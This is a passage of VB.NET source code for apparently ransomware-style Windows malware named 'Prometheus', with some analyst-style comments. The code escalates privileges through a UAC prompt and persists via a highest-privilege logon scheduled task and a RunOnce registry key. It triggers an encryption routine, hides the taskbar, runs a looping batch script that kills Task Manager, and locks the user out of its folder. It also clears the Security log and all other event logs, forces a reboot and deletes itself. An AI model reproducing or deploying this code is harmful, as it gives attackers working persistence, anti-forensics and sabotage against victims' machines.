'When CH() is False, relaunches the current executable with the "runas" verb (a UAC consent prompt) and returns True
'if Process.Start did not throw; returns False when already elevated or on exception.  The current instance keeps running.
Public Function GH() As Boolean
GH = False
If Not CH() Then
Try
'Elevating process privilege programmatically.
'In computing, runas is a command in the Microsoft Windows line of operating systems that allows a user to run specific
'tools and programs under a different username to the one that was used to logon to a computer interactively.
Dim pc As New ProcessStartInfo(Process.GetCurrentProcess.MainModule.FileName) With {
.Verb = "runas"
}
Dim p = Process.Start(pc)
Return True
Catch ex As Exception
Return False
End Try
End If
End Function ' Get Higher Level As Admin.
'Now that the information is gathered, we create a backdoor into the system via entry of Task Scheduler
'with the highest Logon.
'BackgroundWorker that loops forever, sleeping 15 s (&H3A98) per iteration.  If CH() is True it runs
'schtasks /create /rl HIGHEST /sc ONLOGON /tn Prometheus /F /tr "<current exe>", falling back to
'HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\Prometheus when the output lacks "successfully";
'when not elevated it writes the RunOnce value only.  Exceptions per iteration are swallowed.
'Artifacts: scheduled task named "Prometheus", RunOnce value "Prometheus".
Private Sub SubContractors()
' StartUp BackgroundWorker to schedule a startup task
Dim subw As New BackgroundWorker()
AddHandler subw.DoWork, Sub(sender1 As Object,
e1 As DoWorkEventArgs)
'Schedules Task to start up with Admin Rights
While True
Try
If CH() Then
If Not GPO("c:\windows\system32\cmd.exe",
$"/C schtasks /create /rl HIGHEST /sc ONLOGON /tn Prometheus /F /tr """"{Process.GetCurrentProcess.MainModule.FileName}""""").Contains("successfully") Then
My.Computer.Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\RunOnce", True).SetValue("Prometheus",
Process.GetCurrentProcess.MainModule.FileName)
End If
Else
My.Computer.Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\RunOnce", True).SetValue("Prometheus",
Process.GetCurrentProcess.MainModule.FileName)
End If
Catch ex As Exception
End Try
Const MillisecondsTimeout As Integer = &H3A98 '15000
Thread.Sleep(MillisecondsTimeout)
End While
End Sub
subw.RunWorkerAsync()
End Sub
'This is a secondary worker backup for our "Background Worker" in the event the task fails.
'Synchronous variant called from Prometheus_Load: writes the same RunOnce "Prometheus" value, then starts
'schtasks.exe with Arguments assigned from the expression as written, reads its stdout and shows it in a
'MessageBox titled "Create Task Results..".  On Error Resume Next throughout.
Private Sub SoilWork()
On Error Resume Next
Dim p As New Process
With p.StartInfo
.FileName = "schtasks.exe"
.Arguments = $"/C schtasks /create /rl HIGHEST /sc ONLOGON /tn Prometheus /F /tr """"{Process.GetCurrentProcess.MainModule.FileName}""""".Contains("successfully")
.UseShellExecute = False
.RedirectStandardOutput = True
.CreateNoWindow = True
End With
My.Computer.Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\RunOnce",
True).SetValue("Prometheus", Process.GetCurrentProcess.MainModule.FileName)
p.Start()
Dim s As String = p.StandardOutput.ReadToEnd
MessageBox.Show(s,
"Create Task Results..")
End Sub
'Timer1: one-shot trigger for the encryption pass (Dead_Meadow), then starts the self-destruct timer and hides the taskbar.
Private Sub Timer1_Tick(sender As Object, e As EventArgs) Handles Timer1.Tick
Timer1.Stop()
Dead_Meadow()
Timer2.Start() 'self destruct sequence of Prometheus = previous presence gone from system
CmdHideTaskBar()
End Sub
#End Region
'Hides Taskbar
'Locates the "Shell_traywnd" window (the Explorer taskbar) and calls SetWindowPos with SWP_HIDEWINDOW.
Private Sub CmdHideTaskBar()
Dim thwnd As Long
thwnd = FindWindow("Shell_traywnd", "")
Call SetWindowPos(thwnd, 0, 0, 0, 0, 0, SWP_HIDEWINDOW)
End Sub
'Timer2: one-shot; starts Timer5 (AddDirectorySecurity) and issues the self-delete command.
Private Sub Timer2_Tick(sender As Object, e As EventArgs) Handles Timer2.Tick
Timer2.Stop()
Timer5.Start()
Ultimate_Self_Destruct() 'Call's for self-destruction of Prometheus
End Sub
'This program destroys itself after it's carnage
'Starts a hidden cmd.exe running "/C timeout 2 && Del /Q /F <Application.ExecutablePath>" so the file is removed
'after this process exits.  Detection: cmd.exe child with "timeout" and "Del" in its command line.
Public Sub Ultimate_Self_Destruct()
On Error GoTo Err
Dim Info As New ProcessStartInfo With {
.Arguments = $"/C timeout 2 && Del /Q /F {Application.ExecutablePath}",
.WindowStyle = ProcessWindowStyle.Hidden,
.CreateNoWindow = True,
.FileName = "cmd.exe"
}
Process.Start(Info)
Err:
End Sub
'Detect Flash Drive Insertion | Auto-Start Application "
'Function that gets the "Drive Letter" from the unit mask
'This detects flash plug-in>>>
'Maps a single-bit unit mask (bit i => drive letter A+i, i in 0..25) to its Char.
'If no bit matches, execution falls off the end and the default Char (ChrW(0)) is returned.  No caller in this file.
Private Function GetDriveLetterFromMask(ByRef Unit As Integer) As Char
On Error Resume Next
For i As Integer = 0 To 25
If Unit = (2 ^ i) Then
Return Chr(Asc("A") + i)
End If
Next
End Function
'Timer3: stops itself and does nothing else.
Private Sub Timer3_Tick(sender As Object, e As EventArgs) Handles Timer3.Tick
Timer3.Stop()
End Sub
'Timer4: forced restart via "shutdown -r -f -t 5" (started from Prometheus_Load).
Private Sub Timer4_Tick(sender As Object, e As EventArgs) Handles Timer4.Tick
Timer4.Stop()
Process.Start("shutdown", "-r -f -t 5") '-t 5: five-second delay before the forced restart
End Sub
' This is how you launch batch Script through VB.Net coding. Basically , this creates a bat file that loops
' killing task manager
'Writes AntiTaskManager.bat into the process's current directory and starts it.  The script relaunches itself
'hidden through a generated %temp%\bas.vbs (WScript.Shell Run ... vbhide), then loops "Taskkill /IM taskmgr.exe /F".
'The trailing lines referencing HyperNova.bat follow an unconditional "goto loop".
'Artifacts: AntiTaskManager.bat, %temp%\bas.vbs, repeated taskkill.exe launches from cmd.exe.
Private Sub AntiTaskManager()
Try
Dim rythorian77 As New StringBuilder
rythorian77.AppendLine("@echo off")
rythorian77.AppendLine("Title: Batch AutoHideStart by: Rythorian77 (Justin Linwood Ross)")
rythorian77.AppendLine(":Commandline")
rythorian77.AppendLine("IF [""%~1""]==[""-e""] GoTo o")
rythorian77.AppendLine(":Clear vbs")
rythorian77.AppendLine("set Batch=%~%dpnx0")
rythorian77.AppendLine("(")
rythorian77.AppendLine("echo set objshell^= createobject^(""wscript.shell""^)")
rythorian77.AppendLine("echo obshell^.run ""%Batch% -e""^,vbhide ) > %temp%\bas.vbs")
rythorian77.AppendLine("start %temp%\bas.vbs")
rythorian77.AppendLine("exit")
rythorian77.AppendLine(":eek:")
rythorian77.AppendLine(":Loop")
rythorian77.AppendLine("Taskkill /IM taskmgr.exe /FI ""STATUS eq RUNNING"" /F")
rythorian77.AppendLine("goto loop")
rythorian77.AppendLine("IF NOT %ERRORLEVEL%==0")
rythorian77.AppendLine("CreateObject(""Wscript.Shell"").Run ""HyperNova.bat"", 0, True")
rythorian77.AppendLine("GoTo begin")
File.WriteAllText("AntiTaskManager.bat", rythorian77.ToString())
Process.Start("AntiTaskManager.bat")
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
End Sub
'In most cases, the string returned by this method consists of all characters in the path up to, but not including,
'the last directory separator character(s). A directory separator character can be either DirectorySeparatorChar or
'AltDirectorySeparatorChar. If the path consists of a root directory, such as "c:\", null is returned.
'This method does Not support paths Using "file:".
'Because the returned path does Not include the last directory separator character(s),
'passing the returned path back into the GetDirectoryName method truncates one folder level per subsequent
'Call On the result path. For example, passing the path "C:\Directory\SubDirectory\test.txt" into GetDirectoryName
'returns "C:\Directory\SubDirectory". Passing that path, "C:\Directory\SubDirectory", into GetDirectoryName
'returns "C:\Directory".
'Adds a Deny FullControl rule for the current user name on the executable's directory, then clears the
'"Security" event log and afterwards every log returned by EventLog.GetEventLogs() (the loop reuses the
'eventLog variable).  Clearing the Security log requires administrative rights and is itself recorded by
'Windows (the "audit log was cleared" event, ID 1102), which is a strong detection signal.  Whole body under On Error GoTo Err.
Private Sub MatriArk()
On Error GoTo Err
Dim folderPath As String = Path.GetDirectoryName(Assembly.GetExecutingAssembly().Location)
Dim adminUserName As String = Environment.UserName
Dim ds As DirectorySecurity = Directory.GetAccessControl(folderPath)
Dim fsa As New FileSystemAccessRule(adminUserName, FileSystemRights.FullControl, AccessControlType.Deny)
ds.AddAccessRule(fsa)
Directory.SetAccessControl(folderPath, ds)
Dim eventLog = New EventLog("Security", Environment.MachineName)
eventLog.Clear()
For Each eventLog In EventLog.GetEventLogs()
eventLog.Clear()
eventLog.Dispose()
Next
Err:
End Sub
'Timer5: one-shot; runs AddDirectorySecurity after the self-delete has been queued.
Private Sub Timer5_Tick(sender As Object, e As EventArgs) Handles Timer5.Tick
Timer5.Stop()
AddDirectorySecurity()
End Sub
'Timer6 and Timer7 hand off to each other indefinitely and perform no other work in this file.
Private Sub Timer6_Tick(sender As Object, e As EventArgs) Handles Timer6.Tick
Timer6.Stop()
Timer7.Start()
End Sub
Private Sub Timer7_Tick(sender As Object, e As EventArgs) Handles Timer7.Tick
Timer7.Stop()
Timer6.Start()
End Sub
End Class